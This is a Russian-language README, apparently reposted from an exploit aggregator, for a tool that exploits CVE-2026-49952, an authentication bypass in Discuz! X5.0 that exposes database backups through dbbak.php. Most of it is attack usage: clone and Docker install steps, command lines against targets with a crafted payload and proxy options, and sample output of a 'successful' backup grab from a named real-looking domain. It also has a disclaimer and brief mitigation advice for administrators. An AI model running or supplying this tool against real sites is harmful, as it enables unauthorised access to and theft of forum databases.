## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CERBERUSMRXI-DISCUZ-X5.0-AUTHENTICATION-BYPASS-EXPLOIT-FRAMEWORK
# Фреймворк эксплуатации обхода аутентификации Discuz! X5.0
     
**⚡ CVE-2026-49952 | CVSS 9.1 (Критический ) | Версия 1.0.0**
Профессиональный инструмент для тестирования на проникновение, предназначенный для выявления и демонстрации критической уязвимости обхода аутентификации в Discuz! X5.0.

* * *
## 📋 Содержание
* ⚠️ Отказ от ответственности
* 🔍 Обзор
* 🎯 Детали уязвимости
* ✨ Возможности
* 📦 Установка
* 🚀 Быстрый старт
* 💻 Примеры использования
* 🖥️ Интерактивная оболочка
* 🛡️ Вопросы безопасности
* 🔧 Устранение неполадок
* 📄 Лицензия
* * *
## ⚠️ Отказ от ответственности
> **ВАЖНОЕ УВЕДОМЛЕНИЕ** Этот инструмент предоставляется только для **образовательных целей** и **авторизованного тестирования безопасности**.**НЕ ИСПОЛЬЗУЙТЕ** этот инструмент на системах, которыми вы не владеете или для тестирования которых у вас нет явного разрешения.Несанкционированный доступ к компьютерным системам **незаконен** и **неэтичен**.Автор **не несёт ответственности** за любое неправильное использование или ущерб, причинённый данным инструментом.Используя этот инструмент, вы соглашаетесь соблюдать все применимые **законы и нормативные акты**.
* * *
## 🔍 Обзор
**Фреймворк эксплуатации обхода аутентификации Discuz! X5.0** предназначен для выявления и демонстрации критической уязвимости обхода аутентификации (CVE-2026-49952) в версиях Discuz! X5.0, выпущенных в период с 20 марта 2026 года по 1 мая 2026 года.
Эта уязвимость позволяет неаутентифицированным злоумышленникам получить доступ к функции резервного копирования базы данных (`dbbak.php`) путём эксплуатации оракула шифрования UC_KEY для повторного использования токена, что потенциально может привести к раскрытию конфиденциального содержимого базы данных.
### Ключевые моменты
* 🏆 **Оценка CVSS:** 9.1 (Критический)
* 🔐 **Воздействие:** Обход аутентификации
* 📂 **Доступ:** Файлы резервных копий базы данных
* ⚡ **Сложность:** Низкая (легко эксплуатируется)
* 🎯 **Цель:** Discuz! X5.0 (20260320 - 20260501)
* * *
## 🎯 Детали уязвимости
### Техническое описание
### Первопричина
Уязвимость присутствует в конечной точке `dbbak.php`, где механизм проверки токена полагается на оракул шифрования UC_KEY. Создав специальную полезную нагрузку в запросе входа в систему (`member.php`), злоумышленник может получить действительный токен аутентификации, который можно повторно использовать для доступа к функции резервного копирования базы данных без надлежащей авторизации.
### Затронутые версии
* ❌ Discuz! X5.0 (20260320 - 20260501) - **уязвима**
* ✅ Discuz! X5.0 (20260510+) - **исправлена**
* * *
## ✨ Возможности
### Основные возможности
* 🔍 **Определение версии:** автоматическое распознавание отпечатков и идентификация версии Discuz!.
* ⚡ **Многовариантная атака:** параллельное тестирование нескольких вариантов полезной нагрузки.
* 🖥️ **Интерактивная оболочка:** полнофункциональный интерфейс командной строки для ручной эксплуатации.
* 🚀 **Автоматическая эксплуатация:** эксплуатация в один клик с минимальной настройкой.
* 📊 **Сохранение результатов:** экспорт результатов эксплуатации в файлы с временными метками.
* 🌐 **Поддержка прокси:** настройка HTTP/HTTPS прокси для сетевого доступа.
* 🎯 **Многопоточное сканирование:** настраиваемое количество потоков для оптимизации производительности.
* 🎨 **Цветной вывод:** профессиональный цветной вывод в терминале.
### Дополнительные возможности
* 🔐 **Поддержка SSL/TLS:** работа с целями как по HTTP, так и по HTTPS.
* 🔄 **Управление сеансами:** поддержание постоянного состояния сеанса.
* 📦 **Настройка полезной нагрузки:** поддержка внедрения пользовательской полезной нагрузки.
* 🎯 **Проверка цели:** проверка установки Discuz! перед эксплуатацией.
* * *
## 📦 Установка
### Предварительные требования
* **Python:** версия 3.7 или выше
* **Pip:** менеджер пакетов Python
### Установка из исходного кода
root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework
# Install required packages
pip install -r requirements.txt
# Verify installation
python3 exploit.py --help
### Установка через Docker
root@kitploit:~
# Build the Docker image
docker build -t exploit .
# Run the container
docker run -it --rm exploit http://target.com
* * *
## 🚀 Быстрый старт
### Базовое использование
root@kitploit:~
# Simple exploitation
python3 exploit.py http://target.com
# With output file
python3 exploit.py http://target.com --output results.txt
# Verbose mode for debugging
python3 exploit.py http://target.com --verbose
### Расширенное использование
root@kitploit:~
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10
# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"
* * *
## 💻 Примеры использования
### Пример 1: Базовая эксплуатация
root@kitploit:~
python3 exploit.py http://discuz.eda.com.my
**📤 Ожидаемый вывод**
root@kitploit:~
██████╗ ██╗███████╗██╗ ██╗███████╗███████╗██████╗
██╔══██╗██║██╔════╝██║ ██║╚══███╔╝╚══███╔╝╚════██╗
██║ ██║██║███████╗██║ ██║ ███╔╝ ███╔╝ █████╔╝
██║ ██║██║╚════██║██║ ██║ ███╔╝ ███╔╝ ██╔═══╝
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝
Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt
╔══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════╣
║ Target: http://discuz.eda.com.my ║
║ Authcode: aBcDeFgHiJkLmNoPqRsT... ║
║ Status: Database backup accessed ║
║ Data Size: 24567 bytes ║
║ Saved to: discuz_exploit_20260724_143218.txt ║
╚══════════════════════════════════════════════════════════╝
* * *
## 🖥️ Интерактивная оболочка
Запустите интерактивную оболочку для ручной эксплуатации:
root@kitploit:~
python3 discuz_exploit.py http://target.com --interactive
### Доступные команды
* * *
## 🛡️ Вопросы безопасности
### ✅ Что следует делать
* Используйте только на системах, которыми вы **владеете** или на тестирование которых имеете **явное разрешение**.
* Получите **письменное разрешение** перед тестированием.
* Следуйте практике **ответственного раскрытия** уязвимостей.
* Сообщайте об уязвимостях **производителям** надлежащим образом.
* Используйте в **изолированных лабораторных средах** для обучения.
### ❌ Чего не следует делать
* Никогда не используйте против **производственных систем** без разрешения.
* Не публикуйте **полученные данные** в открытом доступе.
* Никогда не используйте для **незаконной деятельности** или **кражи данных**.
* Не изменяйте и не **удаляйте** данные во время тестирования.
* Никогда не проводите эксплуатацию **без согласия**.
### Рекомендации по снижению риска
Для системных администраторов:
1. **Немедленно обновитесь:** обновитесь до Discuz! X5.0 (20260510+) или более поздней версии.
2. **Отключите конечную точку:** временно отключите `dbbak.php`, если в ней нет необходимости.
3. **Следите за журналами:** отслеживайте подозрительные обращения к `member.php` и `dbbak.php`.
4. **Правила WAF:** внедрите правила Web Application Firewall для блокировки вредоносных запросов.
5. **Белый список IP:** ограничьте доступ к конечной точке резервного копирования доверенными IP-адресами.
* * *
## 🔧 Устранение неполадок
**❌ Ошибки подключения**
root@kitploit:~
Error: Failed to connect to target
Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
**🚫 Ошибка аутентификации**
root@kitploit:~
Error: Authentication failed or invalid authcode
Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details
* * *
## 📄 Лицензия
Этот проект лицензирован в соответствии с **лицензией MIT**.
Copyright © 2026 Sudeepa Wanigarathna
Настоящим предоставляется бесплатное разрешение любому лицу, получившему копию данного программного обеспечения и связанных файлов документации (далее — «Программное обеспечение»), использовать Программное обеспечение без ограничений, включая, без ограничений, права использовать, копировать, изменять, объединять, публиковать, распространять, сублицензировать и/или продавать копии Программного обеспечения, а также разрешать лицам, которым предоставлено Программное обеспечение, делать это при соблюдении следующих условий:
Вышеуказанное уведомление об авторских правах и данное разрешение должны быть включены во все копии или значительные части Программного обеспечения.
ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ», БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ, ЯВНЫХ ИЛИ ПОДРАЗУМЕВАЕМЫХ, ВКЛЮЧАЯ, НО НЕ ОГРАНИЧИВАЯСЬ, ГАРАНТИЯМИ ТОВАРНОЙ ПРИГОДНОСТИ, СООТВЕТСТВИЯ КОНКРЕТНОМУ НАЗНАЧЕНИЮ И ОТСУТСТВИЯ НАРУШЕНИЯ ПРАВ. НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ АВТОРЫ ИЛИ ПРАВООБЛАДАТЕЛИ НЕ НЕСУТ ОТВЕТСТВЕННОСТИ ПО КАКИМ-ЛИБО ИСКАМ, УБЫТКАМ ИЛИ ИНОЙ ОТВЕТСТВЕННОСТИ, БУДЬ ТО В СИЛУ ДОГОВОРА, ДЕЛИКТА ИЛИ ИНЫМ ОБРАЗОМ, ВОЗНИКШИМ ИЗ ИЛИ В СВЯЗИ С ПРОГРАММНЫМ ОБЕСПЕЧЕНИЕМ ИЛИ ЕГО ИСПОЛЬЗОВАНИЕМ ИЛИ ИНЫМИ ДЕЙСТВИЯМИ С НИМ.
* * *
**Автор:** Sudeepa Wanigarathna | **GitHub:** @CerberusMrXi
⭐ Если вы считаете этот инструмент полезным, пожалуйста, поставьте ему звезду!
**🔐 Используйте ответственно. Будьте этичны. Продолжайте учиться.**